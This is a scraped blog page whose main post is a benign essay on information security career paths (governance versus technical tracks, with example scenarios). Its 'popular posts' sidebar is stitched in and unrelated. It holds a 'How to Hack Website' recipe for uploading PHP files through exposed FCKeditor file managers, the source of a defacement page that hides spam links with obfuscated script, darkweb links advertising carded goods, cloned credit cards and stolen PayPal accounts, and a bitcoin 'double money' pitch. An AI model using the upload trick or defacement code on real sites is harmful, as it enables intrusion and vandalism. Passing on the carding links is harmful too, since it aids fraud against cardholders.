Skip to main content

Information Security Career Paths – The Truth

Information Security Career Paths – The Truth

When it comes to information security career paths there are so many directions you can go it can make your head spin.  This is a good thing though because that also means there are so many options to find your dream job.  Did you know that the Information Security field is both one of the fastest growing industries and also the highest paid?  Not to mention one of the most fun if I must say so myself!

So, to start we should first think about this by looking at the industry as a pie that is cut in half.  On one side of the pie you have those people who aren’t very technical or are technical but prefer the more Governance and Management side of Information Security.  This is the first half.

On the second half of the pie you likely have those people who are very technical, are more hands on with the day to day tasks and deal less with the Managerial and Governance duties like say creating and maintaining policies.

This isn’t to say that there aren’t people that end up on both sides at the same time or that you have to choose but this is to simply say this is probably the easiest way to grasp the roles.

In each of these two categories we could keep breaking this out into the various roles and that list would be endless because there are so many different types of positions within the Information Security world.  We thought it important to point out these two main paths at the very top because it is important to understand when mapping out your career and where you are trying to go so you know what steps you need to take to get there.

If you are a very big people person you might want to consider going the Governance route as you are guaranteed to be around people and there is a huge need to use your communication skills to help further the security of your organization.  If you are someone who can’t stand talking for long periods of time and hate going to meetings then the technical path may be better for you.

Again, all this is not to say that you won’t have to communicate if you go the technical route because you absolutely will as you will need those skills in almost any job.  It is just that the amount could be very different depending on the path.

So now that we have the two main paths out of the way let’s take a look at two scenarios within each area to get an idea on what type of positions we might be able to look forward to.

Scenario 1 (Red Team Manager):

Again, the lists are endless but let’s say your ultimate goal is to take the more technical path to becoming a red team manager 10 years from now where you are leading a team of penetration testers to test various organizations for fun.  Well, to get there you may want to start by getting an entry level Network Security Engineer position where you are maintaining the network and security infrastructure on a daily basis.  This might help you get those basic skills so that when you get your first interview as a novice pentester you actually know those basic technical questions you are guaranteed to be asked.  From there you can spend several years honing your skills to get you into the position where you are now managing a team of pentesters rather than just conducting one at a time yourself.

Scenario 2 (Bank Executive):
This is a very different path than the first scenario where maybe your ultimate goal is to be an executive at a bank.  These are totally different skills than what is needed in scenario #1.  For this, communication skills are huge as you will be managing many people but you still need to know information security concepts.  For this path you might want to start off as an entry level auditor where you gain both information security skills but also have a ton of interactions with those you are auditing and gain soft skills that allow you to better navigate an organizations politics and be able to get there.  From there you can spend several years in a Risk Management role or something similar where you work your way up managing more and more people where you ultimately end up managing a small organization within a large bank.

Scenario 3 (Unsure Path):

You may be completely unsure on what path to take and sometimes until you figure out what path you want to take the best thing is to take all paths.  It is better if you already know what path you would prefer to take because going this route may be longer as you don’t know exactly where you are going.  In this case you try to gain as many technical and governance type skills as possible.  You may take a position as a network engineer for a while and then in the next position you may decide you want to help write an organization’s policies.  Again, this route isn’t the most ideal because when you go into an interview there may be questions around why you were writing policies for a while when you wanted to be a pentester or why you were helping to maintain a network as an engineer but are applying to be an Operations Risk Manager.  Also, have you heard that saying a jack of all trades and master of none?

When trying to decided your information security career path it is always best to try to look out in the future and see the target you are likely to want to hit and then work backwards to see the path you need to take to get there.  This is guaranteed to give you the best results.

Thank you ❤️

Written By: @AyAz_TeChY
Customers don't understand cyber security. It does not matter what your skills are as long as you can BS your way out to get business by fear (that's what we do, don't we).

Even if a team is full of CEH guys or girls, managers will project them as world class teams with 1000 years of collective experience.

I would bet my money on pre sales professionals who will get business. Rest, it does not matter. Reports will come beautiful and pleasing to the client in the end.

Comments

Popular posts from this blog

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS

50 HIGH PR FORUMS AND BOOKMARKING SITES FOR BACKLINKS http://answers.microsoft.com/en-us http://archiveoflinks.com / http://community.sitepoint.com / http://de.lirio.us / http://del.icio.us / http://dondir.com / http://filesharingtalk.com / http://forum.deviantart.com / http://forum.joomla.org / http://forums.cnet.com / http://forums.hostgator.com / http://forums.mysql.com / http://forums.searchenginewatch.com / http://simplemachines.org/community/index.php http://www.247webdirectory.com / http://www.2daydir.com / http://www.9dir.com/Submit http://www.9sites.net / http://www.9w1.net / http://www.a1webdirectory.org / http://www.abacusseo.com / http://www.abc-directory.com / http://www.abigdir.com / http://www.acewebdirectory.com / http://www.add2us.com / http://www.addbusiness.net / http://www.addlink.us / http://www.addlinkzfree.com / http://www.addsite.info / http://www.afreeurl.info / http://www.agrieducation.org / http://www.alistdirectory.com / http...
200++ high pr eductinon&goverment site backline As We know how important backlinks are for rankings in Google for a blog/site and page rank which definitely is the trusted way to show how well your blog is which most advertiser look for.I have come up with top .gov & .edu website by registering where you can get backlinks easily.Sograb these backlinsk and see the magic how  your website ranks on Google with these high PR boosting .gov and .edu backlinks.A high quality backlinks worth thousands low quality backlinks, especially the one coming fromedu and .gov sites. Google loves backlinks from.edu & .gov sites and thus give your site good ranking in SERPs. An edu & .’gov backlinks is associated with an educational institute & government organization therefore considered asmost authentic and valued backlink in term of SEO because they are from non-profit source givequality information, not a spam one and since exists for long time in the field, have high ...

How to Hack Website

inurl:/editor/editor/filemanager Just open uploadtest.html Or test.html Then select PHP server Upload file Copy uploaded file url Paste it after the link Www.xyz.com //.... Enjoy Regards :- HACKER 22385

Abdul hacker deface page

Abdul hacker deface page     <EMBED src=" http://greencall.co.kr/.p/we_will_not_go_down.swf " type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">     <html>         <body onload="scrlsts()"><script type="text/javascript"> document.write('<' + 'di' + 'v sty' + 'le="position: absolute; l' + 'eft: -1946px; t' + 'op' + ': -2856px;" class="sufoxyyhvnyswxs15">'); </script> <a href=" http://cergyd7.dev2.cmantika.com/includes/index.php ">installment loans california bad credit</a> <a href=" http://www.diamondwares.net/logs/index.php ">online cash loan direct lenders</a> <a href=" http://armastroy.com/templates/index.php ">easy loan kota kinabalu</a> <a href=" http://www.magazinecambodia.com/templates/index....

Blogs on Computer Security:

Blogs on Computer Security: https://antelox.blogspot.com / http://www.dumpanalysis.org/blog / http://www.abuse.ch / http://zairon.wordpress.com / http://androguard.blogspot.com / http://blog.w4kfu.com / http://akhenath0n.blogspot.com / http://diarrlf.wordpress.com / http://deobfuscated.blogspot.com / http://www.h-i-r.net / http://mysterie.fr/blog / http://www.skullsecurity.org/blog / http://www.wrgross.com/blogs/security / http://net-effects.blogspot.com / http://eiploader.wordpress.com / http://cyb3rsleuth.blogspot.com / http://0entropy.blogspot.com / http://siri-urz.blogspot.com / http://newsoft-tech.blogspot.com / http://www.ragestorm.net/blogs / http://codeexploration.blogspot.com / http://esploit.blogspot.com / http://thexploit.com / http://mysterie.fr/blog / http://bailey.st/blog / http://touchmymalware.blogspot.ru / http://blog.delroth.net / http://novahackers.blogspot.com / http://greatis.com/blog / http://mcdermottcybersecurity.com / http://grand...

Various Forums

JuanDeLemos: 1. Kali Linux http://distrowatch.com/kali   http://www.kali.org/  http://forums.kali.org/ Kali Linux (formerly known as BackTrack) is a Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture, a choice of four popular desktop environments, and seamless upgrades to newer versions. 2. Tails  http://distrowatch.com/tails  https://tails.boum.org/  https://tails.boum.org/support/index.en.html https://mailman.boum.org/listinfo/ The Amnesic Incognito Live System (Tails) is a Debian-based live CD/USB with the goal of providing complete Internet anonymity for the user. The product ships with several Internet applications, including web browser, IRC client, mail client and instant messenger, all pre-configured with security in mind and with all traffic anonymised. To achieve this, Incognito uses the Tor network to make Internet traffic very hard to trace...

Darkweb and Deepweb llinks latest 2017 Huge collection!!!!

hi guys... as u know deep web and darkweb is most dangeorus part of the internet... but without site link....what where will u surf it ... so i did some reasearch and get the collection.... hope u like it.. Gonzalo Nuñez: 1. Xillia (was legit back in the day on markets) http://cjgxp5lockl6aoyg.onion 2. http://cjgxp5lockl6aoyg.onion/worldwide-cardable-sites-by-alex 3. http://cjgxp5lockl6aoyg.onion/selling-paypal-accounts-with-balance-upto-5000dollars 4. http://cjgxp5lockl6aoyg.onion/cloned-credit-cards-free-shipping 5. 6. ——————————————————————————————- 7. 8. 9. UNSORTED 10. 11. Amberoad http://amberoadychffmyw.onion 12. KognitionsKyrkan http://wd43uqrbjwe6hpre.onion 13. Malina http://malina2ihfyawiau.onion 14. BB Compendium http://jq.26zp5ygkpszripvv.onion 15. Hackbb pages index (cauti...

hacking tools and lab

Resources (Free) Virtual Networks (VPNs) • ChaosVPN: http://wiki.hamburg.ccc.de/ChaosVPN • Gh0st Networks: http://www.gh0st.net / • Hacking Lab: https://www.hacking-lab.com / • p0wnlabs: http://p0wnlabs.com / • pwn0: https://pwn0.com / • PentestIT: https://lab.pentestit.ru / Custom Personal Targets • Hack A Server: https://hackaserver.com / • Hack Me: http://hack.me / • Hack This: https://www.hackthis.co.uk / • Smash The Stack: http://smashthestack.org / • Hack The Box: https://www.hackthebox.gr / • SecAdvise: https://labs.secadvise.com / • DarkHive: http://darkhive.net / • Avatao: https://avatao.com / • Root-Me: https://www.root-me.org / Archive/Repository • Security Conference Library: http://archive.liquidmatrix.org / • Shell-Storm.org Repository: http://repo.shell-storm.org/CTF / Misc • Bug crowd: ht...

open a new bitcoin account and made double money

open a new bitcoin account and made double money MenuAbout UsContact Us Privacy Policy Disclaimer Sitemap  Main MenuBlogging tipsBlog designing  Blog traffic How TosMake Money Online  How to open a bitcoin account, earn, double your earnings and withdraw your money to physical cash. Bloggers Prof 11:12:00 AM  4 I recently discovered that people are now interested in bitcoin because of its high rate of popularity now in telegram, but nevertheless, I would be talking today on  how to get money into your bitcoin wallet  and how to go about your funds, weather you would withdraw it or you sell it to someone, I talked about everything you need to know about bitcoin and how to create your wallet, create your wallet let's move to today's deal. There are many ways to get  money into your wallet,   you can buy and you can also earn it , I want to show you list of sites you can earn bits from fast, Afte...

Tor Darkweb Link

Tor link max telegram big acker: https://cardedlxzxsphu5y.onion/ SHOP FOR BUYING CARDED PRODUCTS https://2or24opd2hkebadv.onion/index.php  TORBAY FORUM chickencaptain: http://kpynyvym6xqi7wz2.onion/ parazite files and links max telegram big acker: https://kr5hou2zh4qtebqk.onion.cab/ezines/ ARCHIEVE OF SOME VINTAGE AS WELL AS NEW STUFFS https://superkuhbitj6tul.onion/library/ LIBRARY OF BOOKS ON VARIOUS TOPICS https://yuxv6qujajqvmypv.onion/ GUIDE ON USING AN SECURE OPERATING SYSTEM https://bpo4ybbs2apk4sk4.onion/en A COLLECTION OF TOOLS RELATED TO SECURITY P4RN3R: https://ondemand5xot4hdw.onion/  Tor On Demand max telegram big acker: https://f3mnl42ax3qtu3a7.onion/ GOVT LEAKS https://kzspryu63qbjfncp.onion/  DIGITAL PAWN SHOP https://yniir5c6cmuwslfl.onion/ STRANGE WEBSITE, CANT DESCRIBE https://vrimutd6so6a565x.onion.cab/index.php/Board ANONYMOUS POSTING https://h2am5w5ufhvdifrs.onion/ CRYPTOME ARCHIVE OF GOV CONSPIRACY FILES https://torc5bhzq6xorhb4.o...